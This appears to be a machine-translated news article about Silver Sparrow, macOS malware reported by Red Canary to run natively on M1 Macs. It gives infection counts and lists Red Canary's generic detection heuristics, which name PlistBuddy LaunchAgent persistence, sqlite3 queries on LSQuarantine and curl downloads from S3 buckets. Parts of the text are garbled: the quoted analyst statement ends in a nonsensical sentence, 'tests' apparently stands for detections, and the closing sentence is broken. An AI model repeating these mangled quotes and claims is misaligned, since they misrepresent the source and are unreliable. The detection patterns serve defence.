Security company Red Canary discovered a second known malware that has been compiled to run locally on the M1 Mac.
Despite this, Red Canary said that the malware could be a “quite serious threat”:
Although we have not yet observed that Silver Sparrow can provide other malicious payloads, its forward-looking M1 chip compatibility, global coverage, relatively high infection rate, and operational maturity indicate that Silver Sparrow is a very serious threat with unique features. The positioning can provide immediate notification of the effective load that may have an impact.
According to data provided by Malwarebytes, as of February 17, “Silver Sparrow” has infected 29,139 macOS systems in 153 countries, including “a large number of tests in the United States, the United Kingdom, Canada, France and Germany.” Red Canary did not specify how many of these systems are M1 Macs.
Given that “Silver Sparrow” binaries “do not seem to have done so much yet”, Red Canary refers to them as “bystander binaries.” When executed on an Intel-based Mac, the malware package only displays a blank window with “Hello, World!” Message, and the Apple Silicon Binary file results in a red window showing “You did it!”.
Red Canary shares methods for detecting multiple macOS threats, but these steps are not specific to detecting “Silver Sparrow”:
-Find the process that contains PlistBuddy and execute it with the command line containing the following: LaunchAgents, RunAtLoad and true. This analysis helps us find multiple macOS malware families that establish LaunchAgent persistence.
-Looking for processes executed in conjunction with sqlite3
A command line containing the following: LSQuarantine. This analysis helps us find multiple macOS malware families that manipulate or search the metadata of downloaded files.
-Look for a process that looks like curl and execute it with the command line containing s3.amazonaws.com. This analysis helps us use S3 buckets for distribution to find multiple macOS malware families.
A few days ago, the first malware that could run locally on the M1 Mac was discovered.For technical details of the second malware, see Red Canary’s blog post, and Technology studio There is also a good interpreter.